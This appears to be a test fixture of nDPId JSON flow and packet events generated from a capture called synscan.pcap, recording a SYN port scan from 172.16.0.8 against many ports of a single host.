-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs+tUAAC4GH52sEAAIQA2GNIzTGoXdU4MZAAAAAGACDAASBwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAso94AADIGcpSsEAAIQA2GNIzTwA\/dU4MZAAAAAGACDABsfAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsjjIAADgGgkCsEAAIQA2GNIzTPpLdU4MZAAAAAGACBAD1+QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAslp4AADEGgNSsEAAIQA2GNIzTzlbdU4MZAAAAAGACCABiNQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsSfoAADIGzHisEAAIQA2GNIzTDRfdU4MZAAAAAGACDAAfdQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsZi0AAC0GtUWsEAAIQA2GNIzTF\/HdU4MZAAAAAGACCAAYmwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsQHUAADIG1f2sEAAIQA2GNIzTw1DdU4MZAAAAAGACDABpOwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1831,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1821,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQ8AADEG8mOsEAAIQA2GNIzSBA7dUoMYAAAAAGACCAAsgQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsOxEAADIG22GsEAAIQA2GNIzSB9jdUoMYAAAAAGACDAAktwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061155,"flow_last_seen":1278275061155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1236,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1823,"flow_packet_id":1,"flow_last_seen":1278275061155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061155,"pkt":"ACYLMQczACWzv5HuCABFAAAskNcAACgGj5usEAAIQA2GNIzSBNTdUoMYAAAAAGACBAAvuwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsAUAAAC4GGTOsEAAIQA2GNIzSAFXdUoMYAAAAAGACDAAsOgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsL9AAADcG4aKsEAAIQA2GNIzSCAHdUoMYAAAAAGACEAAgjgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsBAUAADcGDW6sEAAIQA2GNIzSGfbdUoMYAAAAAGACEAAOmQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061157,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1837,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_packet_id":1,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061157,"pkt":"ACYLMQczACWzv5HuCABFAAAsDuMAACoGD5CsEAAIQA2GNIzSA+\/dUoMYAAAAAGACDAAooAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1838,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsX6QAACgGwM6sEAAIQA2GNIzSBFTdUoMYAAAAAGACBAAwOwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1839,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsdbIAACYGrMCsEAAIQA2GNIzSpg7dUoMYAAAAAGACDACGgAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1830,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAsxmUAADQGTg2sEAAIQA2GNIzSAdHdUoMYAAAAAGACBAAyvgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061158,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_packet_id":1,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061158,"pkt":"ACYLMQczACWzv5HuCABFAAAs+dgAADEGHZqsEAAIQA2GNIzSDDjdUoMYAAAAAGACCAAkVwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061172,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_packet_id":1,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061172,"pkt":"ACYLMQczACWzv5HuCABFAAAsQg4AACsG22SsEAAIQA2GNIzSAnHdUoMYAAAAAGACEAAmHgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061172,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_packet_id":1,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061172,"pkt":"ACYLMQczACWzv5HuCABFAAAsIHkAADAG9\/msEAAIQA2GNIzSCBHdUoMYAAAAAGACBAAsfgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAs7ucAACYGM4usEAAIQA2GNIzTgALdU4MZAAAAAGACDACsiQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1835,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsKmoAACkG9QisEAAIQA2GNIzTFxfdU4MZAAAAAGACCAAZdQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1846,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1836,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsv7wAACcGYbasEAAIQA2GNIzTBdbdU4MZAAAAAGACEAAitgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1847,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1837,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsookAACUGgOmsEAAIQA2GNIzSC2jdUoMYAAAAAGACCAAlJwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1848,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1838,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAs3UgAADQGNyqsEAAIQA2GNIzSDmndUoMYAAAAAGACBAAmJgAAAgQFtA=="} 
